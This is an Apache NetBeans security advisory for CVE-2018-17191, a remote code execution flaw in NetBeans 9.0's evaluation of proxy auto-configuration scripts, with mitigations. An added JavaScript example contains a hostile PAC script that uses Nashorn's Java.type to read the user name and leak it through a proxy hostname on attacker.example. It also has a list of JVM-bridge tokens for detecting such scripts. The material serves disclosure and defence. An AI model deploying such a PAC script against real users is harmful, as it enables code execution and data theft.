Date: Sun, 30 Dec 2018 13:48:52 +0100
From: Matthias Bläsing <>
Cc: Moritz Bechler <>
Subject: [CVE-2018-17191] Apache NetBeans 9.0 Proxy Auto-Configuration (PAC)
 interpretation is vulnerable for remote command execution (RCE)


NetBeans Proxy Auto-Configuration (PAC) interpretation
is vulnerable to remote command execution (RCE)

Versions Affected: 
- Apache NetBeans (incubating) 9.0
- NetBeans releases before the Apache transition started may also be
  affected

To be vulnerable to the issue, the system running NetBeans must be
configured to use Proxy Auto-Configuration (PAC), NetBeans must be
configured to use the system proxy settings, and the attacker must be
able to modify the PAC script.

Proxy Auto-Configuration (PAC) lets a proxy provider hand the client
its proxy settings automatically. The configuration is not a static
description but JavaScript code that calculates the proxy to use for
each requested URL.

Depending on the Java version NetBeans runs on, two vectors exist:

If the Java version supports the Nashorn JavaScript engine, execution
was sandboxed by limiting the classes accessible to the script. It was
found that, due to a vulnerability in the JRE, this sandbox can be
circumvented. This allows arbitrary code to be executed in the context
of the NetBeans application.

If the Java version does not support Nashorn, a generic JavaScript
engine was used, which is not restricted at all. This allows execution
of arbitrary code in the context of the NetBeans application.
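As an added example (not part of this advisory or of NetBeans), the
following JavaScript sketches what a PAC host evaluates and why an
unrestricted engine is dangerous: the standard PAC helper functions are
re-implemented locally, a constructed benign PAC script is loaded with
only those helpers in scope, and a constructed hostile script that
calls Nashorn's Java.type bridge is flagged by a simple identifier
check. Proxy names, address ranges and both scripts are made up for the
example.

```javascript
// Added example (not from the advisory or NetBeans): a minimal PAC host.
// A PAC file must define FindProxyForURL(url, host) and is supposed to call
// only the helper functions the host exposes. These are the well-known PAC
// helpers, re-implemented in plain JavaScript so the example runs offline.
const pacHelpers = {
  isPlainHostName: (host) => !host.includes("."),
  dnsDomainIs: (host, domain) => host.endsWith(domain),
  shExpMatch: (str, shexp) => {
    // Turn the shell glob into a regex: escape regex metacharacters first,
    // then map * -> .* and ? -> .
    const re = shexp
      .replace(/[.+^${}()|[\]\\]/g, "\\$&")
      .replace(/\*/g, ".*")
      .replace(/\?/g, ".");
    return new RegExp("^" + re + "$").test(str);
  },
  isInNet: (ip, net, mask) => {
    // Real hosts resolve names here; this demo only accepts dotted quads.
    if (!/^\d{1,3}(\.\d{1,3}){3}$/.test(ip)) return false;
    const toInt = (a) =>
      a.split(".").reduce((acc, o) => (acc << 8) | (parseInt(o, 10) & 255), 0) >>> 0;
    const m = toInt(mask);
    return (toInt(ip) & m) === (toInt(net) & m);
  },
};

// Constructed benign PAC script (made-up proxy names and ranges): internal
// hosts go DIRECT, everything else through the corporate proxy.
const benignPac = `
function FindProxyForURL(url, host) {
  if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example")) return "DIRECT";
  if (isInNet(host, "10.0.0.0", "255.0.0.0")) return "DIRECT";
  if (shExpMatch(url, "http://*.updates.example/*")) return "PROXY updates-proxy.corp.example:3128";
  return "PROXY proxy.corp.example:8080; DIRECT";
}`;

// Constructed hostile PAC script: still a syntactically valid PAC file, but
// it reaches past the PAC API into the JVM through Nashorn's Java.type
// bridge. It only reads a system property here; a script that gets this far
// runs with whatever the NetBeans process can do.
const hostilePac = `
function FindProxyForURL(url, host) {
  var sys = Java.type("java.lang.System");
  return "PROXY " + sys.getProperty("user.name") + ".attacker.example:8080";
}`;

// Evaluate a PAC script with only the helpers as named parameters and return
// its FindProxyForURL. This is a scoping trick for the demo, not a sandbox:
// the script still has the engine's full language and host capabilities,
// which is exactly the problem the advisory describes.
function loadPac(source) {
  const names = Object.keys(pacHelpers);
  const factory = new Function(...names, source + "\nreturn FindProxyForURL;");
  return factory(...names.map((n) => pacHelpers[n]));
}

// Heuristic audit for a PAC file fetched from the configured URL: flag
// identifiers that only mean something when the script engine exposes the JVM
// (Nashorn's Java.type, Rhino/Nashorn Packages, importClass/importPackage).
// A hit means the file is not a plain PAC script. Plain string matching is
// trivially obfuscated, so a clean result means "nothing obvious", not safe.
const jvmBridgeTokens = [
  /\bJava\.type\b/,
  /\bPackages\b/,
  /\bimportClass\b/,
  /\bimportPackage\b/,
  /\bjava\.lang\b/,
];
function pacReachesJvm(source) {
  return jvmBridgeTokens.some((re) => re.test(source));
}
```

Under Node.js the hostile script's FindProxyForURL throws a
ReferenceError because no Java object exists in scope; under Nashorn, or
under a Rhino build with LiveConnect, the same line resolves to the JVM,
which is the escape this advisory describes. The identifier check is a
triage aid for auditing the PAC file a machine is configured with, not a
sandbox; the actual fixes remain the mitigations listed below.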


The issue can be mitigated using one of the following options:

- Upgrade to Apache NetBeans 10.0
- Disable Proxy Auto-Configuration for the whole OS
  (please refer to the system documentation how to do that)
- Disable "Use System Proxy Settings" in the NetBeans Options and
  configure the proxy manually

The issue was identified by Moritz Bechler.

